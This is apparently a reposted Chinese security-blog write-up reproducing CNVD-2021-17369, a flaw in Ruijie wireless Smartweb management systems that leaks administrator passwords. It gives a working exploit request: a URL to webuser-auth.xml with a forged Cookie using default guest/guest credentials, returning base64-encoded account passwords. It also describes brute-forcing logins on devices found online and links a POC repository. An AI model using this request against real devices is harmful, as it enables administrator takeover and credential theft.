锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

admin

102210
文章

87
评论

2021年4月4日06:35:17评论391 views字数 1225阅读4分5秒阅读模式

点击蓝字

关注我们

声明

本文作者：PeiQi
本文字数：700

阅读时长：10min

附件/链接：点击查看原文下载

本文属于【狼组安全社区】原创奖励计划，未经许可禁止转载

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，狼组安全团队以及文章作者不为此承担任何责任。

前言

一、

漏洞描述

锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。

二、

漏洞影响

锐捷网络股份有限公司无线smartweb管理系统

三、

漏洞复现

今天逛CNVD看到了这个漏洞的公开

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

于是网上找设备登录页面的截图，发现标题为 无线smartWeb--登录页面

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

登录页面如下

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

然后找到了一个设备存在管理admin员的弱口令，进去后发现Web CLI控制台

翻文件的过程中发现一个文件很有意思，运行命令查看

more /web/xml/webuser-auth.xml

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

里面存在所有人的账号密码，于是测试直接访问

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml发现被拦截了，不能访问，想到刚刚CNVD的描述是低权限获取高权限账号

于是继续爆破账号密码，找一个低权限账号，然后正在愁密码的时候，看见另一条 CNVD

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

拿几个弱口令爆破一下，发下多个设备默认存在 guest账户，账号密码为 guest/guest

但是没有CIL控制台可以使用了，在重新测试访问刚刚的漏洞点

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

解密就可以获得 admin管理员的密码，请求为

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

直接获得所有的账户的等级标志和base64加密的账号密码,解密后即可登录后台

四、

Goby & POC

Goby & POC 已经同步到 Github仓库中的 Goby & POC 目录https://github.com/PeiQi0/PeiQi-WIKI-POChttps://github.com/wgpsec/wiki其中包含CNVD-2020-56167 和 CNVD-2021-17369

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

作者

推荐一下PeiQi的个人公众号~

扫描关注公众号回复加群

和师傅们一起讨论研究~

长

按

关

注

WgpSec狼组安全团队

微信号：wgpsec

Twitter：@wgpsec

本文始发于微信公众号（WgpSec狼组安全团队）：锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

左青龙
微信扫一扫

右白虎
微信扫一扫

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

用友-政务-FileDownload-任意文件读取漏洞复现

卡车卫星定位系统/user/create存在未授权密码重置漏洞

用友-U8-Cloud-TableInputOperServlet存在反序列化漏洞

CVE-2024-26503

致远互联 OA fileUpload.do 文件上传漏洞

某世界500强企业|存在通杀漏洞(0day)

CVE-2024-32409 POC

【Weblogic 文件上传漏洞（CVE-2019-2618）

Weblogic 任意文件读取漏洞（CVE-2019-2615)

用友U8 slbmbygr.jsp 存在sql注入

发表评论

在线咨询

微信